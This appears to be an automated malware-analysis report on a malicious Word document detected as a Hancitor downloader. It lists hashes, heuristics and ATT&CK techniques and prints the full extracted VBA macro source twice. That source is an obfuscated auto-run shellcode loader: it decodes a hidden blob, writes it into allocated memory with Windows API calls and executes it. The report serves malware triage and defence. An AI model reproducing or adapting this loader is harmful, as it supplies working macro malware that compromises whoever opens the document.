Office (OLE) malware analysis — malicious · 8e23f3952c148df5

MALICIOUS

Office (OLE)

136.5 KB Created: 2016-11-10 16:52:00 Authoring application: Microsoft Office Word First seen: 2017-04-07

MD5: 24135d03688b134461cfcedeec37ac60 SHA-1: 560eb04c8bbd19986f8af1cec30cba6697ed5210 SHA-256: 8e23f3952c148df5a87ba5b27430e3724e85dc711f1d800fa46ba1e47f0aa83b

110 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The presence of the VirtualAlloc API reference and the ClamAV detection signature 'Doc.Downloader.Hancitor-6735733-0' strongly suggest this is a downloader. The VBA code appears to be obfuscated, but the overall intent is to download and execute a second-stage payload, likely leveraging the detected Hancitor family's capabilities. The document is likely delivered as a spearphishing attachment.

Heuristics 5

ClamAV: Doc.Downloader.Hancitor-6735733-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Hancitor-6735733-0
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code

Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro

Matched line in script

Attribute VB_Customizable = True
Private Sub Document_Open()
Dim vulgum As Integer

Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12218 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12218 bytes
SHA-256: `7cdf7eb94abbdbe0d7d365438ccccc34dab59d785685ea14fdf23107dc6aee57`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Dim vulgum As Integer Dim distrust As String shame = "countess" mascotte = "warfarin" unsheathed For peaceable = 47 To 53 annul = 53 moves = moves - 409 patois = Replace("pmoses", "moses", "o") & "co" patois = "mad" & "efaction" Next peaceable End Sub Sub Open_MSWord() On Error GoTo errorHandler Dim wdApp As Word.Application Dim myDoc As Word.Document Dim mywdRange As Word.Range Set wdApp = New Word.Application With wdApp .Visible = True .WindowState = wdWindowStateMaximize End With Set myDoc = wdApp.Documents.Add Set mywdRange = myDoc.Words(1) With mywdRange .Text = Range("F6") & " This text is being used to test subroutine." & _ " More meaningful text to follow." .Font.Name = "Comic Sans MS" .Font.Size = 12 .Font.ColorIndex = wdGreen .Bold = True End With errorHandler: Set wdApp = Nothing Set myDoc = Nothing Set mywdRange = Nothing End Sub Sub unsheathed() Dim inodorousness As Long Dim chimakum As Variant Set oftness = muses.expedited.BoundValue("Tab2") mckinley = oftness.ControlTipText aspleniaceae = 12 + 9236 leptocephalus = Right(mckinley, aspleniaceae) steeply = jaywalker.adenium(leptocephalus) walkabout = 6 While walkabout <> 10 walkabout = walkabout + 1 botuliform = moves Or 491 sterope = sterope Wend samarium = "bonduc" #If VBA6 And Win64 Then Dim masochistic As Byte Dim cryogenics As ditto Dim attentive As LongPtr cryogenics.elseifstatement = 63 + 92 + 113 - 268 Dim creature As String #Else Dim computer As Variant cryogenics = 0 Dim thyroidectomy As Integer Dim attentive As Long #End If davy = 13 - 13 abasia = "busy" inauspiciousness = "alular" numismatical = 4096 cheremis = 10 While cheremis <> 15 cheremis = cheremis + 1 repine = Round(309.713) mirounga = sterope Wend finished = "absorbency" matador = "passer" assertion = "strongwilled" aruru = "ho" & Replace("lbreachy", "breachy", "f") rebound = 4 While rebound <> 9 rebound = rebound + 1 repine = Abs(416.383) sterope = "hupa" Wend apportion = steeply misogynic = "asclepiad" attentive = cemetery(apportion) bumboat = "cade" #If VBA6 And Win64 Then Dim experiences As Integer outrival = Replace("expeptide", "peptide", "c") & LCase$("elLEn") & Mid("bookplatetlybowelless", 10, 3) achromia = "astronomer" gj = 122 - 48 - 65 + 1271 #ElseIf Win32 Then coiled = "unpretending" councilor = "clerk" falstaff = 13 + 100 + 71 + 322 gj = falstaff + 3923 #End If Dim nichrome As String Dim flaring As Variant Dim cow As Long cow = 2048 Dim didactically As Long didactically = attentive + gj Dim betimes As Long betimes = 1 unguem = bookkeeping(didactically, cow, betimes, betimes) For unsatisfied = 30 To 65 polity = 65 mirounga = sterope stinger = Replace("eskean", "skean", "x") & "acti" & Replace("ophobic", "phobic", "n") stinger = Replace("abiff", "biff", "p") & Right("southwesterprentice", 8) Next unsatisfied End Sub Function cemetery(fluorine) Dim stuccco As Byte Dim hedonic As Integer Dim dita As Long camphor dita, ByVal VarPtr(fluorine) + 8, 4 Dim errancy As Byte Dim monition As Integer Dim decker As Long colorful = 0 sociopathic = -1 stercorarius = 103 + 75 + 32 - 210 mirounga = lookdown mirounga = lookdown saturated = 106 - 82 - 62 + 4134 efface = industry(ByVal sociopathic, ByVal stercorarius, 9419, saturated, 64) mirounga = lookdown camphor decker, ByVal VarPtr(efface) + 8, 4 orderliness = Fix(203.1325) camphor ByVal decker, ByVal dita, 108 - 119 + 6976 coaid = 11 While coaid <> 15 coaid = coaid + 1 repine = Fix(134.173) moves = Int(156.1242) Wend cemetery = decker End Function Attribute VB_Name = "jaywalker" 'Don't it amaze you? #If VBA6 And Win64 Then 'ï»¿Love can be so strange Public Type ditto 'ï»¿Love can be so strange elseifstatement As LongPtr 'Don't it astound you? End Type 'But you're not gonna crack Public Declare PtrSafe Function averrhoa Lib "user32" Alias "OpenClipboard" (mammuthus As LongPtr) As Boolean 'To understand this crazy world Public Declare PtrSafe Function bookkeeping Lib "kernel32.dll" Alias "EnumCalendarInfoA" (ByVal janua As Any, ByVal acromion As Any, ByVal arable As Any, ByVal anarchy As Any) As LongPtr 'So when nothing seems too certain or safe Public Declare PtrSafe Sub camphor Lib "ntdll.dll" Alias "RtlMoveMemory" (universal As Any, nitric As Any, ByVal irreclaimable As LongPtr) 'Don't it astound you? Public Declare PtrSafe Function bilaterality Lib "kernel32.dll" Alias "Sleep" (albula As LongPtr) 'Don't it astound you? Public Declare PtrSafe Function ancylidae Lib "user32" Alias "SetParent" (ByVal casa As LongPtr, ByVal illness As LongPtr,ist As LongPtr) As LongPtr 'Don't it astound you? Public Declare PtrSafe Function industry Lib "kernel32.dll" Alias "VirtualAllocEx" (pectoris As LongPtr, decease As LongPtr, ByVal cubit As LongPtr, ByVal nulli As LongPtr, ByVal mansuetude As LongPtr) As LongPtr 'Every time you give yourself away Public Declare PtrSafe Function bissau Lib "user32" Alias "EndPaint" (annotto As LongPtr,erode As LongPtr) As LongPtr 'Run my baby run my baby run Public Declare PtrSafe Function disappearing Lib "user32" Alias "GetUpdateRect" (groenendael As LongPtr, brogue As LongPtr,banneret As LongPtr) As Boolean 'Love's an elusive charm and it can be painful 'So you're not gonna crack #Else 'So you're not gonna crack Public Declare Function accrue Lib "kernel32.dll" Alias "Sleep" (docile As Long) 'So when nothing seems too certain or safe Public Declare Function becalm Lib "user32" Alias "EndPaint" (variously As Long, cleistothecium As Long) As Long 'Don't it amaze you? Public Declare Function asynergic Lib "user32" Alias "SetParent" (ByVal sunday As Long, ByVal butcherbird As Long, fledgling As Long) As Long 'To late for solutions to solve in the setting sun Public Declare Function picrasma Lib "user32" Alias "OpenClipboard" (unreverberant As Long) As Boolean 'No you're never gonna crack Public Declare Function bookkeeping Lib "kernel32.dll" Alias "EnumCalendarInfoW" (ByVal beneficiary As Any, ByVal libel As Any, ByVal lightingup As Any, ByVal amphisbaena As Any) As Long 'Let it burn through you Public Declare Function industry Lib "kernel32.dll" Alias "VirtualAllocEx" (bluefin As Long, contretemps As Long, ByVal microgliacyte As Long, ByVal autoplagiarism As Long, ByVal buteo As Long) As Long 'Love's an elusive charm and it can be painful Public Declare Sub camphor Lib "ntdll.dll" Alias "RtlMoveMemory" (mauger As Any, sheraton As Any, ByVal semiotics As Long) 'To late for solutions to solve in the setting sun Public Declare Function kicking Lib "user32" Alias "GetUpdateRect" (irritare As Long, positron As Long, blurred As Long) As Boolean 'So when nothing seems too certain or safe 'Don't it amaze you? #End If 'Cause life is so short there's no time to waste it Function therm(autonomous) therm = AscW(autonomous) End Function Function garner(soapbox, underlining) garner = soapbox And underlining End Function Function adenium(cephalotaxus) As String Dim tolerable As String Dim frieze As Integer Dim oculomotor As Long Dim cruetstand(255) As Byte orderliness = orderliness And 90 Dim amphidiploid As Long moves = Fix(493.268) Dim bookplate As String Dim magistracy As Integer Dim distrain(63) As Long Dim vinegrub(63) As Long Dim squamule() As Byte Dim debilitation(6965) As Byte Dim committeeman As Long Dim calisaya(63) As Long Dim desertful As Integer Dim cloudcompeller As Long Dim picumnus As Integer avaunt = 255 Dim defectiveness As Long Dim parcenary As Byte cobwebs = 9 - 62 + 108 + 16711625 quassation = 65536 aloeaceae = 63 glowingly = 65280 lowlander = 24 + 87 + 257937 megakaryocyte = 262144 outstation = 16515072 back = 256 carbonate = 64 bloodbath = 117 + 119 + 3860 noneffervescent = 4032 Dim chaetodipterus As Integer Dim impeccability(9247) As Byte suaviter = 105 + 9143 For nut = 1 To suaviter monandry = Mid$(cephalotaxus, nut, 1) lygaeid = "centigram" dialect = "troublemaker" atropos = therm(monandry) impeccability(nut - 1) = atropos Next Dim facade As Long For abnormalize = 16 To 62 piggish = 62 mirounga = "ossific" dosages = Right("bigamyal", 2) & "b" dosages = LCase$("Con") & "forma" & "nce" Next abnormalize bookbinder = 9247 disagree = 35 For crumbled = 0 To bookbinder impeccability(crumbled) = impeccability(crumbled) + 5 Next crumbled flatness = 52 suppository = 53 If (flatness - suppository) <> 19 Then flatness = "co" & Right("supplantlumni", 5) & "ation" orderliness = botuliform / 300 moves = Fix(175.191) autogamy = "do" & "tted" Else lookdown = "ctenidium" suppository = 56 End If desertful = 0 conductivity = 88 + 25 - 112 + 121 loriinae = 255 For amphidiploid = 0 To loriinae If (amphidiploid >= 65) And (amphidiploid <= 90) Then cruetstand(amphidiploid) = amphidiploid - 65 ElseIf (amphidiploid >= 97) And (amphidiploid <= 122) Then cruetstand(amphidiploid) = amphidiploid - 71 ElseIf (amphidiploid >= 48) And (amphidiploid <= 57) Then cruetstand(amphidiploid) = amphidiploid + 4 ElseIf amphidiploid = 43 Then cruetstand(amphidiploid) = 62 ElseIf amphidiploid = 47 Then cruetstand(amphidiploid) = 63 End If Next amphidiploid For amphidiploid = 0 To 63 calisaya(amphidiploid) = ablaze(amphidiploid, carbonate) vinegrub(amphidiploid) = ablaze(amphidiploid, bloodbath) distrain(amphidiploid) = ablaze(amphidiploid, megakaryocyte) Next amphidiploid cautela = 2 While cautela <> 7 cautela = cautela + 1 sterope = "lyonia" botuliform = Round(55.46) Wend squamule = impeccability disaffected = 4 For clathraceae = 5 To 58 acrobatic = 58 moves = Abs(179.942) morus = Right("paralyzera", 2) & Replace("tseder", "seder", "ioni") morus = Right("eubacterialesre", 2) & "seda" Next clathraceae aurar = 125 + 13 - 135 sterope = "accede" orderliness = Abs(300.843) atole = aurar + 1 nondisposable = 2 For oculomotor = 0 To bookbinder minerva = squamule(oculomotor) aures = squamule(oculomotor + 2) committeeman = distrain(cruetstand(minerva)) _ + vinegrub(cruetstand(squamule(oculomotor + 1))) + calisaya(cruetstand(aures)) + cruetstand(squamule(oculomotor + aurar)) amphidiploid = garner(committeeman, cobwebs) debilitation(cloudcompeller) = aujordhui(amphidiploid, quassation) amphidiploid = garner(committeeman, glowingly) debilitation(cloudcompeller + 1) = aujordhui(amphidiploid, back) debilitation(cloudcompeller + nondisposable) = garner(committeeman, avaunt) cloudcompeller = cloudcompeller + nondisposable + 1 oculomotor = oculomotor + 3 Next adenium = debilitation End Function Function aujordhui(continental, inefficiently) aujordhui = continental \ inefficiently End Function Function Strip_Hyperlinks_Bookmarks_Fields() Dim myLink As Hyperlink Dim myBookmark As Bookmark Dim myField As Field With ActiveDocument For Each myLink In .Hyperlinks myLink.Delete Next myLink For Each myBookmark In .Bookmarks myBookmark.Delete Next myBookmark For Each myField In .Fields myField.Unlink Next myField End With End Function Function ablaze(assentment, doubts) ablaze = assentment * doubts End Function Attribute VB_Name = "muses" Attribute VB_Base = "0{BF703C55-4447-474E-B776-20B249E82C65}{9245A813-65D3-40A1-915C-6E7B51C01726}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: 7cdf7eb94abbdbe0d7d365438ccccc34dab59d785685ea14fdf23107dc6aee57

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim vulgum As Integer
Dim distrust As String
shame = "countess"
mascotte = "warfarin"
unsheathed
For peaceable = 47 To 53
annul = 53
moves = moves - 409
patois = Replace("pmoses", "moses", "o") & "co"
patois = "mad" & "efaction"
Next peaceable
End Sub
Sub Open_MSWord()
    On Error GoTo errorHandler
    Dim wdApp As Word.Application
    Dim myDoc As Word.Document
    Dim mywdRange As Word.Range
    Set wdApp = New Word.Application
   
    With wdApp
        .Visible = True
        .WindowState = wdWindowStateMaximize
    End With
   
    Set myDoc = wdApp.Documents.Add
   
    Set mywdRange = myDoc.Words(1)
   
    With mywdRange
        .Text = Range("F6") & " This text is being used to test subroutine." & _
            "  More meaningful text to follow."
        .Font.Name = "Comic Sans MS"
        .Font.Size = 12
        .Font.ColorIndex = wdGreen
        .Bold = True
    End With
   
errorHandler:
   
    Set wdApp = Nothing
    Set myDoc = Nothing
    Set mywdRange = Nothing
End Sub

Sub unsheathed()
Dim inodorousness As Long
Dim chimakum As Variant
Set oftness = muses.expedited.BoundValue("Tab2")
mckinley = oftness.ControlTipText
aspleniaceae = 12 + 9236
leptocephalus = Right(mckinley, aspleniaceae)
steeply = jaywalker.adenium(leptocephalus)
walkabout = 6
While walkabout <> 10
walkabout = walkabout + 1
botuliform = moves Or 491
sterope = sterope
Wend

samarium = "bonduc"
#If VBA6 And Win64 Then
Dim masochistic As Byte
Dim cryogenics As ditto
Dim attentive As LongPtr
cryogenics.elseifstatement = 63 + 92 + 113 - 268
Dim creature As String
#Else
Dim computer As Variant
cryogenics = 0
Dim thyroidectomy As Integer
Dim attentive As Long
#End If
davy = 13 - 13
abasia = "busy"
inauspiciousness = "alular"
numismatical = 4096
cheremis = 10
While cheremis <> 15
cheremis = cheremis + 1
repine = Round(309.713)
mirounga = sterope
Wend

finished = "absorbency"
matador = "passer"
assertion = "strongwilled"
aruru = "ho" & Replace("lbreachy", "breachy", "f")
rebound = 4
While rebound <> 9
rebound = rebound + 1
repine = Abs(416.383)
sterope = "hupa"
Wend

apportion = steeply
misogynic = "asclepiad"
attentive = cemetery(apportion)
bumboat = "cade"
#If VBA6 And Win64 Then
Dim experiences As Integer
outrival = Replace("expeptide", "peptide", "c") & LCase$("elLEn") & Mid("bookplatetlybowelless", 10, 3)
achromia = "astronomer"
gj = 122 - 48 - 65 + 1271
#ElseIf Win32 Then
coiled = "unpretending"
councilor = "clerk"
falstaff = 13 + 100 + 71 + 322
gj = falstaff + 3923

#End If
Dim nichrome As String
Dim flaring As Variant
Dim cow As Long
cow = 2048
Dim didactically As Long
didactically = attentive + gj
Dim betimes As Long
betimes = 1
unguem = bookkeeping(didactically, cow, betimes, betimes)
For unsatisfied = 30 To 65
polity = 65
mirounga = sterope
stinger = Replace("eskean", "skean", "x") & "acti" & Replace("ophobic", "phobic", "n")
stinger = Replace("abiff", "biff", "p") & Right("southwesterprentice", 8)
Next unsatisfied

End Sub

Function cemetery(fluorine)
Dim stuccco As Byte
Dim hedonic As Integer
Dim dita As Long
camphor dita, ByVal VarPtr(fluorine) + 8, 4
Dim errancy As Byte
Dim monition As Integer
Dim decker As Long
colorful = 0
sociopathic = -1
stercorarius = 103 + 75 + 32 - 210
mirounga = lookdown

mirounga = lookdown

saturated = 106 - 82 - 62 + 4134
efface = industry(ByVal sociopathic, ByVal stercorarius, 9419, saturated, 64)
mirounga = lookdown

camphor decker, ByVal VarPtr(efface) + 8, 4
orderliness = Fix(203.1325)

camphor ByVal decker, ByVal dita, 108 - 119 + 6976
coaid = 11
While coaid <> 15
coaid = coaid + 1
repine = Fix(134.173)
moves = Int(156.1242)
Wend

cemetery = decker
End Function


Attribute VB_Name = "jaywalker"
'Don't it amaze you?
#If VBA6 And Win64 Then
'ï»¿Love can be so strange
Public Type ditto
'ï»¿Love can be so strange
elseifstatement As LongPtr
'Don't it astound you?
End Type
'But you're not gonna crack
Public Declare PtrSafe Function averrhoa Lib "user32" Alias "OpenClipboard" (mammuthus As LongPtr) As Boolean
'To understand this crazy world
Public  Declare PtrSafe Function bookkeeping Lib "kernel32.dll" Alias "EnumCalendarInfoA" (ByVal janua As Any, ByVal acromion As Any, ByVal arable As Any, ByVal anarchy As Any) As LongPtr
'So when nothing seems too certain or safe
Public  Declare PtrSafe Sub camphor Lib "ntdll.dll" Alias "RtlMoveMemory" (universal As Any, nitric As Any, ByVal irreclaimable As LongPtr)
'Don't it astound you?
Public Declare PtrSafe Function bilaterality Lib "kernel32.dll" Alias "Sleep" (albula As LongPtr)
'Don't it astound you?
Public Declare PtrSafe Function ancylidae Lib "user32" Alias "SetParent" (ByVal casa As LongPtr, ByVal illness As LongPtr,ist As LongPtr) As LongPtr
'Don't it astound you?
Public  Declare PtrSafe Function industry Lib "kernel32.dll" Alias "VirtualAllocEx" (pectoris As LongPtr, decease As LongPtr, ByVal cubit As LongPtr, ByVal nulli As LongPtr, ByVal mansuetude As LongPtr) As LongPtr
'Every time you give yourself away
Public Declare PtrSafe Function bissau Lib "user32" Alias "EndPaint" (annotto As LongPtr,erode As LongPtr) As LongPtr
'Run my baby run my baby run
Public Declare PtrSafe Function disappearing Lib "user32" Alias "GetUpdateRect" (groenendael As LongPtr, brogue As LongPtr,banneret As LongPtr) As Boolean
'Love's an elusive charm and it can be painful

'So you're not gonna crack
#Else
'So you're not gonna crack
Public Declare Function accrue Lib "kernel32.dll" Alias "Sleep" (docile As Long)
'So when nothing seems too certain or safe
Public Declare Function becalm Lib "user32" Alias "EndPaint" (variously As Long, cleistothecium As Long) As Long
'Don't it amaze you?
Public Declare Function asynergic Lib "user32" Alias "SetParent" (ByVal sunday As Long, ByVal butcherbird As Long, fledgling As Long) As Long
'To late for solutions to solve in the setting sun
Public Declare Function picrasma Lib "user32" Alias "OpenClipboard" (unreverberant As Long) As Boolean
'No you're never gonna crack
Public Declare Function bookkeeping Lib "kernel32.dll" Alias "EnumCalendarInfoW" (ByVal beneficiary As Any, ByVal libel As Any, ByVal lightingup As Any, ByVal amphisbaena As Any) As Long
'Let it burn through you
Public Declare Function industry Lib "kernel32.dll" Alias "VirtualAllocEx" (bluefin As Long, contretemps As Long, ByVal microgliacyte As Long, ByVal autoplagiarism As Long, ByVal buteo As Long) As Long
'Love's an elusive charm and it can be painful
Public Declare Sub camphor Lib "ntdll.dll" Alias "RtlMoveMemory" (mauger As Any, sheraton As Any, ByVal semiotics As Long)
'To late for solutions to solve in the setting sun
Public Declare Function kicking Lib "user32" Alias "GetUpdateRect" (irritare As Long, positron As Long, blurred As Long) As Boolean
'So when nothing seems too certain or safe

'Don't it amaze you?
#End If
'Cause life is so short there's no time to waste it
Function therm(autonomous)
therm = AscW(autonomous)
End Function
Function garner(soapbox, underlining)
garner = soapbox And underlining
End Function
Function adenium(cephalotaxus) As String
Dim tolerable As String
Dim frieze As Integer

Dim oculomotor As Long
Dim cruetstand(255) As Byte
orderliness = orderliness And 90

Dim amphidiploid As Long
moves = Fix(493.268)

Dim bookplate As String

Dim magistracy As Integer

Dim distrain(63) As Long
Dim vinegrub(63) As Long
Dim squamule() As Byte
Dim debilitation(6965) As Byte
Dim committeeman As Long
Dim calisaya(63) As Long
Dim desertful As Integer
Dim cloudcompeller As Long
Dim picumnus As Integer

avaunt = 255
Dim defectiveness As Long

Dim parcenary As Byte

cobwebs = 9 - 62 + 108 + 16711625
quassation = 65536
aloeaceae = 63
glowingly = 65280
lowlander = 24 + 87 + 257937
megakaryocyte = 262144
outstation = 16515072
back = 256
carbonate = 64
bloodbath = 117 + 119 + 3860
noneffervescent = 4032
Dim chaetodipterus As Integer
Dim impeccability(9247) As Byte
suaviter = 105 + 9143
For nut = 1 To suaviter
monandry = Mid$(cephalotaxus, nut, 1)
lygaeid = "centigram"
dialect = "troublemaker"
atropos = therm(monandry)
impeccability(nut - 1) = atropos
Next
Dim facade As Long
For abnormalize = 16 To 62
piggish = 62
mirounga = "ossific"
dosages = Right("bigamyal", 2) & "b"
dosages = LCase$("Con") & "forma" & "nce"
Next abnormalize

bookbinder = 9247
disagree = 35
For crumbled = 0 To bookbinder
impeccability(crumbled) = impeccability(crumbled) + 5
Next crumbled
flatness = 52
suppository = 53
If (flatness - suppository) <> 19 Then
flatness = "co" & Right("supplantlumni", 5) & "ation"
orderliness = botuliform / 300
moves = Fix(175.191)
autogamy = "do" & "tted"
Else
lookdown = "ctenidium"
suppository = 56
End If

desertful = 0
conductivity = 88 + 25 - 112 + 121
loriinae = 255
For amphidiploid = 0 To loriinae
If (amphidiploid >= 65) And (amphidiploid <= 90) Then
cruetstand(amphidiploid) = amphidiploid - 65
ElseIf (amphidiploid >= 97) And (amphidiploid <= 122) Then
cruetstand(amphidiploid) = amphidiploid - 71
ElseIf (amphidiploid >= 48) And (amphidiploid <= 57) Then
cruetstand(amphidiploid) = amphidiploid + 4
ElseIf amphidiploid = 43 Then
cruetstand(amphidiploid) = 62
ElseIf amphidiploid = 47 Then
cruetstand(amphidiploid) = 63
End If
Next amphidiploid
For amphidiploid = 0 To 63
calisaya(amphidiploid) = ablaze(amphidiploid, carbonate)
vinegrub(amphidiploid) = ablaze(amphidiploid, bloodbath)
distrain(amphidiploid) = ablaze(amphidiploid, megakaryocyte)
Next amphidiploid
cautela = 2
While cautela <> 7
cautela = cautela + 1
sterope = "lyonia"
botuliform = Round(55.46)
Wend

squamule = impeccability
disaffected = 4
For clathraceae = 5 To 58
acrobatic = 58
moves = Abs(179.942)
morus = Right("paralyzera", 2) & Replace("tseder", "seder", "ioni")
morus = Right("eubacterialesre", 2) & "seda"
Next clathraceae

aurar = 125 + 13 - 135
sterope = "accede"

orderliness = Abs(300.843)

atole = aurar + 1
nondisposable = 2
For oculomotor = 0 To bookbinder
minerva = squamule(oculomotor)
aures = squamule(oculomotor + 2)
committeeman = distrain(cruetstand(minerva)) _
 + vinegrub(cruetstand(squamule(oculomotor + 1))) + calisaya(cruetstand(aures)) + cruetstand(squamule(oculomotor + aurar))
amphidiploid = garner(committeeman, cobwebs)
debilitation(cloudcompeller) = aujordhui(amphidiploid, quassation)
amphidiploid = garner(committeeman, glowingly)
debilitation(cloudcompeller + 1) = aujordhui(amphidiploid, back)
debilitation(cloudcompeller + nondisposable) = garner(committeeman, avaunt)
cloudcompeller = cloudcompeller + nondisposable + 1
oculomotor = oculomotor + 3
Next
adenium = debilitation
End Function

Function aujordhui(continental, inefficiently)
aujordhui = continental \ inefficiently
End Function
  Function Strip_Hyperlinks_Bookmarks_Fields()
      Dim myLink As Hyperlink
      Dim myBookmark As Bookmark
      Dim myField As Field
      With ActiveDocument
          For Each myLink In .Hyperlinks
              myLink.Delete
          Next myLink
          For Each myBookmark In .Bookmarks
              myBookmark.Delete
          Next myBookmark
          For Each myField In .Fields
              myField.Unlink
          Next myField
      End With
  End Function

Function ablaze(assentment, doubts)
ablaze = assentment * doubts
End Function


Attribute VB_Name = "muses"
Attribute VB_Base = "0{BF703C55-4447-474E-B776-20B249E82C65}{9245A813-65D3-40A1-915C-6E7B51C01726}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.